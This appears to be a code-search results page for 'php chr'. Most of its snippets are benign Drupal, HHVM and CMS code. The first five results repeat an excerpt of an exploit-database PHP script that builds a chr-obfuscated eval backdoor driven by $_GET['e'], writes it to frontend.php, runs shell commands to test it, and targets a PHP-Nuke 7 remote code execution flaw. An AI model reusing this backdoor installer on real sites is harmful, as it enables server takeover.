PageRenderTime 6ms queryFilters 0ms Sphinxql 553ms GetByIds 134ms meta 0ms repositoryFilters 5ms languageFilters 1ms sourceFilters 1ms

84,481 results for 'php chr repo:tof06/yii-bootstrap' (6 ms)

Source

Language

Repository

12510.php https://github.com/B-Rich/fullypwnd.git | PHP | 548 lines
475            //This is a magic_quotes_gpc and mysql safe backdoor that fits on one line.
476            $backdoor='get_magic_quotes_gpc()?eval(stripslashes(".chr(36)."_GET[".chr(34)."e".chr(34)."])):eval(".chr(36)."_GET[".chr(34)."e".chr(34)."])';
477            //Install the backdoor in a relitive directory.
477            //Install the backdoor in a relitive directory.
478            $backdoor_installer.='file_put_contents($_SERVER["DOCUMENT_ROOT"].dirname($_SERVER["SCRIPT_NAME"])."/frontend.php",chr(60)."?php '.$backdoor.'?".chr(62));';
479            //charEncode is used to bypass XSS filters.
496        //test if the backdoor works,  try and clean up after the exploit.
497        $test_backdoor=$http->send($attack_url."/frontend.php?e=".urlencode("echo 31337;unlink('/tmp/theme.php');system('rm /tmp/theme.php');"));
498        if(strstr($test_backdoor,"31337")){
498        if(strstr($test_backdoor,"31337")){
499            print "Remote Code execution tested successfully:\n".$attack_url."/frontend.php?e=phpinfo()".urlencode(';')."\n";
500        }else{
503    }else{
504        ////PHP-Nuke 7.0 Remote Code Execution Exploit using CVE-2004-1315 which affects the phpBB 2.0.6 module.
505        print "PHP-Nuke 7 detected.\n";
12510.php https://github.com/B-Rich/exploit-database.git | PHP | 548 lines
475            //This is a magic_quotes_gpc and mysql safe backdoor that fits on one line.
476            $backdoor='get_magic_quotes_gpc()?eval(stripslashes(".chr(36)."_GET[".chr(34)."e".chr(34)."])):eval(".chr(36)."_GET[".chr(34)."e".chr(34)."])';
477            //Install the backdoor in a relitive directory.
477            //Install the backdoor in a relitive directory.
478            $backdoor_installer.='file_put_contents($_SERVER["DOCUMENT_ROOT"].dirname($_SERVER["SCRIPT_NAME"])."/frontend.php",chr(60)."?php '.$backdoor.'?".chr(62));';
479            //charEncode is used to bypass XSS filters.
496        //test if the backdoor works,  try and clean up after the exploit.
497        $test_backdoor=$http->send($attack_url."/frontend.php?e=".urlencode("echo 31337;unlink('/tmp/theme.php');system('rm /tmp/theme.php');"));
498        if(strstr($test_backdoor,"31337")){
498        if(strstr($test_backdoor,"31337")){
499            print "Remote Code execution tested successfully:\n".$attack_url."/frontend.php?e=phpinfo()".urlencode(';')."\n";
500        }else{
503    }else{
504        ////PHP-Nuke 7.0 Remote Code Execution Exploit using CVE-2004-1315 which affects the phpBB 2.0.6 module.
505        print "PHP-Nuke 7 detected.\n";
39922_0.php https://github.com/B-Rich/osf_db.git | PHP | 549 lines
475            //This is a magic_quotes_gpc and mysql safe backdoor that fits on one line.
476            $backdoor='get_magic_quotes_gpc()?eval(stripslashes(".chr(36)."_GET[".chr(34)."e".chr(34)."])):eval(".chr(36)."_GET[".chr(34)."e".chr(34)."])';
477            //Install the backdoor in a relitive directory.
477            //Install the backdoor in a relitive directory.
478            $backdoor_installer.='file_put_contents($_SERVER["DOCUMENT_ROOT"].dirname($_SERVER["SCRIPT_NAME"])."/frontend.php",chr(60)."?php '.$backdoor.'?".chr(62));';
479            //charEncode is used to bypass XSS filters.
496        //test if the backdoor works,  try and clean up after the exploit.
497        $test_backdoor=$http->send($attack_url."/frontend.php?e=".urlencode("echo 31337;unlink('/tmp/theme.php');system('rm /tmp/theme.php');"));
498        if(strstr($test_backdoor,"31337")){
498        if(strstr($test_backdoor,"31337")){
499            print "Remote Code execution tested successfully:\n".$attack_url."/frontend.php?e=phpinfo()".urlencode(';')."\n";
500        }else{
503    }else{
504        ////PHP-Nuke 7.0 Remote Code Execution Exploit using CVE-2004-1315 which affects the phpBB 2.0.6 module.
505        print "PHP-Nuke 7 detected.\n";
12510.php https://github.com/Bronx205/exploit-database.git | PHP | 548 lines
475            //This is a magic_quotes_gpc and mysql safe backdoor that fits on one line.
476            $backdoor='get_magic_quotes_gpc()?eval(stripslashes(".chr(36)."_GET[".chr(34)."e".chr(34)."])):eval(".chr(36)."_GET[".chr(34)."e".chr(34)."])';
477            //Install the backdoor in a relitive directory.
477            //Install the backdoor in a relitive directory.
478            $backdoor_installer.='file_put_contents($_SERVER["DOCUMENT_ROOT"].dirname($_SERVER["SCRIPT_NAME"])."/frontend.php",chr(60)."?php '.$backdoor.'?".chr(62));';
479            //charEncode is used to bypass XSS filters.
496        //test if the backdoor works,  try and clean up after the exploit.
497        $test_backdoor=$http->send($attack_url."/frontend.php?e=".urlencode("echo 31337;unlink('/tmp/theme.php');system('rm /tmp/theme.php');"));
498        if(strstr($test_backdoor,"31337")){
498        if(strstr($test_backdoor,"31337")){
499            print "Remote Code execution tested successfully:\n".$attack_url."/frontend.php?e=phpinfo()".urlencode(';')."\n";
500        }else{
503    }else{
504        ////PHP-Nuke 7.0 Remote Code Execution Exploit using CVE-2004-1315 which affects the phpBB 2.0.6 module.
505        print "PHP-Nuke 7 detected.\n";
12510.php https://github.com/ButtNet/exploit-database.git | PHP | 548 lines
475            //This is a magic_quotes_gpc and mysql safe backdoor that fits on one line.
476            $backdoor='get_magic_quotes_gpc()?eval(stripslashes(".chr(36)."_GET[".chr(34)."e".chr(34)."])):eval(".chr(36)."_GET[".chr(34)."e".chr(34)."])';
477            //Install the backdoor in a relitive directory.
477            //Install the backdoor in a relitive directory.
478            $backdoor_installer.='file_put_contents($_SERVER["DOCUMENT_ROOT"].dirname($_SERVER["SCRIPT_NAME"])."/frontend.php",chr(60)."?php '.$backdoor.'?".chr(62));';
479            //charEncode is used to bypass XSS filters.
496        //test if the backdoor works,  try and clean up after the exploit.
497        $test_backdoor=$http->send($attack_url."/frontend.php?e=".urlencode("echo 31337;unlink('/tmp/theme.php');system('rm /tmp/theme.php');"));
498        if(strstr($test_backdoor,"31337")){
498        if(strstr($test_backdoor,"31337")){
499            print "Remote Code execution tested successfully:\n".$attack_url."/frontend.php?e=phpinfo()".urlencode(';')."\n";
500        }else{
503    }else{
504        ////PHP-Nuke 7.0 Remote Code Execution Exploit using CVE-2004-1315 which affects the phpBB 2.0.6 module.
505        print "PHP-Nuke 7 detected.\n";
SearchTokenizerTest.php https://github.com/drupal/drupal.git | PHP | 158 lines
130  /**
131   * Like PHP chr() function, but for unicode characters.
132   *
132   *
133   * Function chr() only works for ASCII characters up to character 255. This
134   * function converts a number to the corresponding unicode character. Adapted
142    if ($num < 2048) {
143      return chr(($num >> 6) + 192) . chr(($num & 63) + 128);
144    }
146    if ($num < 65536) {
147      return chr(($num >> 12) + 224) . chr((($num >> 6) & 63) + 128) . chr(($num & 63) + 128);
148    }
150    if ($num < 2097152) {
151      return chr(($num >> 18) + 240) . chr((($num >> 12) & 63) + 128) . chr((($num >> 6) & 63) + 128) . chr(($num & 63) + 128);
152    }
SearchTokenizerTest.php https://gitlab.com/longphu/drupal8.git | PHP | 155 lines
129  /**
130   * Like PHP chr() function, but for unicode characters.
131   *
131   *
132   * chr() only works for ASCII characters up to character 255. This function
133   * converts a number to the corresponding unicode character. Adapted from
141    if ($num < 2048) {
142      return chr(($num >> 6) + 192) . chr(($num & 63) + 128);
143    }
145    if ($num < 65536) {
146      return chr(($num >> 12) + 224) . chr((($num >> 6) & 63) + 128) . chr(($num & 63) + 128);
147    }
149    if ($num < 2097152) {
150      return chr(($num >> 18) + 240) . chr((($num >> 12) & 63) + 128) . chr((($num >> 6) & 63) + 128) . chr(($num & 63) + 128);
151    }
SearchTokenizerTest.php https://gitlab.com/qayoub/drupal.git | PHP | 155 lines
129  /**
130   * Like PHP chr() function, but for unicode characters.
131   *
131   *
132   * chr() only works for ASCII characters up to character 255. This function
133   * converts a number to the corresponding unicode character. Adapted from
141    if ($num < 2048) {
142      return chr(($num >> 6) + 192) . chr(($num & 63) + 128);
143    }
145    if ($num < 65536) {
146      return chr(($num >> 12) + 224) . chr((($num >> 6) & 63) + 128) . chr(($num & 63) + 128);
147    }
149    if ($num < 2097152) {
150      return chr(($num >> 18) + 240) . chr((($num >> 12) & 63) + 128) . chr((($num >> 6) & 63) + 128) . chr(($num & 63) + 128);
151    }
SearchTokenizerTest.php git://github.com/drupal/drupal.git | PHP | 162 lines
135  /**
136   * Like PHP chr() function, but for unicode characters.
137   *
137   *
138   * Function chr() only works for ASCII characters up to character 255. This
139   * function converts a number to the corresponding unicode character. Adapted
147    if ($num < 2048) {
148      return chr(($num >> 6) + 192) . chr(($num & 63) + 128);
149    }
151    if ($num < 65536) {
152      return chr(($num >> 12) + 224) . chr((($num >> 6) & 63) + 128) . chr(($num & 63) + 128);
153    }
155    if ($num < 2097152) {
156      return chr(($num >> 18) + 240) . chr((($num >> 12) & 63) + 128) . chr((($num >> 6) & 63) + 128) . chr(($num & 63) + 128);
157    }
SearchTokenizerTest.php https://github.com/drupal/drupal.git | PHP | 155 lines
128  /**
129   * Like PHP chr() function, but for unicode characters.
130   *
130   *
131   * Function chr() only works for ASCII characters up to character 255. This
132   * function converts a number to the corresponding unicode character. Adapted
140    if ($num < 2048) {
141      return chr(($num >> 6) + 192) . chr(($num & 63) + 128);
142    }
144    if ($num < 65536) {
145      return chr(($num >> 12) + 224) . chr((($num >> 6) & 63) + 128) . chr(($num & 63) + 128);
146    }
148    if ($num < 2097152) {
149      return chr(($num >> 18) + 240) . chr((($num >> 12) & 63) + 128) . chr((($num >> 6) & 63) + 128) . chr(($num & 63) + 128);
150    }
class.AJXP_Controller.php https://github.com/antoinemineau/cms.git | PHP | 579 lines
328        $robustInstallPath = str_replace("/", DIRECTORY_SEPARATOR, AJXP_INSTALL_PATH);
329        $cmd = ConfService::getCoreConf("CLI_PHP")." ".$robustInstallPath.DIRECTORY_SEPARATOR."cmd.php -u=$user -t=$token -a=$actionName -r=$currentRepositoryId";
330        /* Inserted next 3 lines to quote the command if in windows - rmeske*/
331        if (PHP_OS == "WIN32" || PHP_OS == "WINNT" || PHP_OS == "Windows") {
332            $cmd = ConfService::getCoreConf("CLI_PHP")." ".chr(34).$robustInstallPath.DIRECTORY_SEPARATOR."cmd.php".chr(34)." -u=$user -t=$token -a=$actionName -r=$currentRepositoryId";
333        }
351        /*
352        if (PHP_OS == "WIN32" || PHP_OS == "WINNT" || PHP_OS == "Windows") {
353            if(AJXP_SERVER_DEBUG) $cmd .= " > ".$logFile;
358                $tmpBat = implode(DIRECTORY_SEPARATOR, array( $robustInstallPath, "data","tmp", md5(time()).".bat"));
359                $cmd .= "\n DEL ".chr(34).$tmpBat.chr(34);
360                AJXP_Logger::debug("Writing file $cmd to $tmpBat");
378    {
379        if (PHP_OS == "WIN32" || PHP_OS == "WINNT" || PHP_OS == "Windows") {
380              if(AJXP_SERVER_DEBUG) $cmd .= " > ".$logFile;
addslashes_variation2.php https://github.com/bcbod2002/hhvm.git | PHP | 85 lines
1<?php
2/* Prototype  : string addslashes ( string $str )
38                    'he said, ""he will be on leave"',
39                    '"""PHP"""',
40                    "",
52                    'hello'.chr(0).'world',
53                    chr(0).'hello'.chr(0),
54                    chr(0).chr(0).'hello',
54                    chr(0).chr(0).'hello',
55                    chr(0),
56
59                    "'\\0.0.0.0'".chr(0),
60                    chr(0)."'c:\php\'",
61                    '"\\0.0.0.0"',
61                    '"\\0.0.0.0"',
62                    '"c:\php\"'.chr(0)."'",
63                    '"hello"'."'world'".chr(0).'//',
stripslashes_variation2.php https://github.com/bcbod2002/hhvm.git | PHP | 103 lines
1<?php
2/* Prototype  : string stripslashes ( string $str )
49                    'he said, ""he will be on leave"',
50                    '"""PHP"""',
51                    "",
65                    'hello'.chr(0).'world',
66                    chr(0).'hello'.chr(0),
67                    chr(0).chr(0).'hello',
67                    chr(0).chr(0).'hello',
68                    chr(0),
69
72                    "'\\0.0.0.0'".chr(0),
73                    chr(0)."'c:\php\'",
74                    '"\\0.0.0.0"',
74                    '"\\0.0.0.0"',
75                    '"c:\php\"'.chr(0)."'",
76                    '"hello"'."'world'".chr(0).'//',
addslashes_variation2.php https://github.com/beenanner/hhvm.git | PHP | 85 lines
1<?php
2/* Prototype  : string addslashes ( string $str )
38                    'he said, ""he will be on leave"',
39                    '"""PHP"""',
40                    "",
52                    'hello'.chr(0).'world',
53                    chr(0).'hello'.chr(0),
54                    chr(0).chr(0).'hello',
54                    chr(0).chr(0).'hello',
55                    chr(0),
56
59                    "'\\0.0.0.0'".chr(0),
60                    chr(0)."'c:\php\'",
61                    '"\\0.0.0.0"',
61                    '"\\0.0.0.0"',
62                    '"c:\php\"'.chr(0)."'",
63                    '"hello"'."'world'".chr(0).'//',
stripslashes_variation2.php https://github.com/beenanner/hhvm.git | PHP | 103 lines
1<?php
2/* Prototype  : string stripslashes ( string $str )
49                    'he said, ""he will be on leave"',
50                    '"""PHP"""',
51                    "",
65                    'hello'.chr(0).'world',
66                    chr(0).'hello'.chr(0),
67                    chr(0).chr(0).'hello',
67                    chr(0).chr(0).'hello',
68                    chr(0),
69
72                    "'\\0.0.0.0'".chr(0),
73                    chr(0)."'c:\php\'",
74                    '"\\0.0.0.0"',
74                    '"\\0.0.0.0"',
75                    '"c:\php\"'.chr(0)."'",
76                    '"hello"'."'world'".chr(0).'//',
addslashes_variation2.php https://github.com/betashepherd/hhvm.git | PHP | 85 lines
1<?php
2/* Prototype  : string addslashes ( string $str )
38                    'he said, ""he will be on leave"',
39                    '"""PHP"""',
40                    "",
52                    'hello'.chr(0).'world',
53                    chr(0).'hello'.chr(0),
54                    chr(0).chr(0).'hello',
54                    chr(0).chr(0).'hello',
55                    chr(0),
56
59                    "'\\0.0.0.0'".chr(0),
60                    chr(0)."'c:\php\'",
61                    '"\\0.0.0.0"',
61                    '"\\0.0.0.0"',
62                    '"c:\php\"'.chr(0)."'",
63                    '"hello"'."'world'".chr(0).'//',
stripslashes_variation2.php https://github.com/betashepherd/hhvm.git | PHP | 103 lines
1<?php
2/* Prototype  : string stripslashes ( string $str )
49                    'he said, ""he will be on leave"',
50                    '"""PHP"""',
51                    "",
65                    'hello'.chr(0).'world',
66                    chr(0).'hello'.chr(0),
67                    chr(0).chr(0).'hello',
67                    chr(0).chr(0).'hello',
68                    chr(0),
69
72                    "'\\0.0.0.0'".chr(0),
73                    chr(0)."'c:\php\'",
74                    '"\\0.0.0.0"',
74                    '"\\0.0.0.0"',
75                    '"c:\php\"'.chr(0)."'",
76                    '"hello"'."'world'".chr(0).'//',
translator.php https://github.com/bobnet/PhreeBooksERP.git | PHP | 242 lines
169	$output  = array();
170	$header  = '<' . '?' . 'php'  . chr(10);
171	$header .= '// +-----------------------------------------------------------------+' . chr(10);
171	$header .= '// +-----------------------------------------------------------------+' . chr(10);
172	$header .= '// ' . TRANSLATION_HEADER . chr(10);
173	$header .= '// Generated: '     . date('Y-m-d h:i:s') . chr(10);
173	$header .= '// Generated: '     . date('Y-m-d h:i:s') . chr(10);
174	$header .= '// Module/Method: ' . $mod  . chr(10);
175	$header .= '// ISO Language: '  . $lang . chr(10);
180	    $output[$result->fields['pathtofile']]  = $header;
181		$output[$result->fields['pathtofile']] .= '// Path: /' . $result->fields['pathtofile'] . chr(10) . chr(10);
182	  }
188	foreach ($output as $path => $content) {
189	  $content .= chr(10) . '?' . '>' . chr(10); // terminate the file
190	  $new_dir  = $backup->source_dir . substr ($path, 0, strrpos($path, '/'));
addslashes_variation2.php https://github.com/byronkingz/hhvm.git | PHP | 85 lines
1<?php
2/* Prototype  : string addslashes ( string $str )
38                    'he said, ""he will be on leave"',
39                    '"""PHP"""',
40                    "",
52                    'hello'.chr(0).'world',
53                    chr(0).'hello'.chr(0),
54                    chr(0).chr(0).'hello',
54                    chr(0).chr(0).'hello',
55                    chr(0),
56
59                    "'\\0.0.0.0'".chr(0),
60                    chr(0)."'c:\php\'",
61                    '"\\0.0.0.0"',
61                    '"\\0.0.0.0"',
62                    '"c:\php\"'.chr(0)."'",
63                    '"hello"'."'world'".chr(0).'//',
stripslashes_variation2.php https://github.com/byronkingz/hhvm.git | PHP | 103 lines
1<?php
2/* Prototype  : string stripslashes ( string $str )
49                    'he said, ""he will be on leave"',
50                    '"""PHP"""',
51                    "",
65                    'hello'.chr(0).'world',
66                    chr(0).'hello'.chr(0),
67                    chr(0).chr(0).'hello',
67                    chr(0).chr(0).'hello',
68                    chr(0),
69
72                    "'\\0.0.0.0'".chr(0),
73                    chr(0)."'c:\php\'",
74                    '"\\0.0.0.0"',
74                    '"\\0.0.0.0"',
75                    '"c:\php\"'.chr(0)."'",
76                    '"hello"'."'world'".chr(0).'//',
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21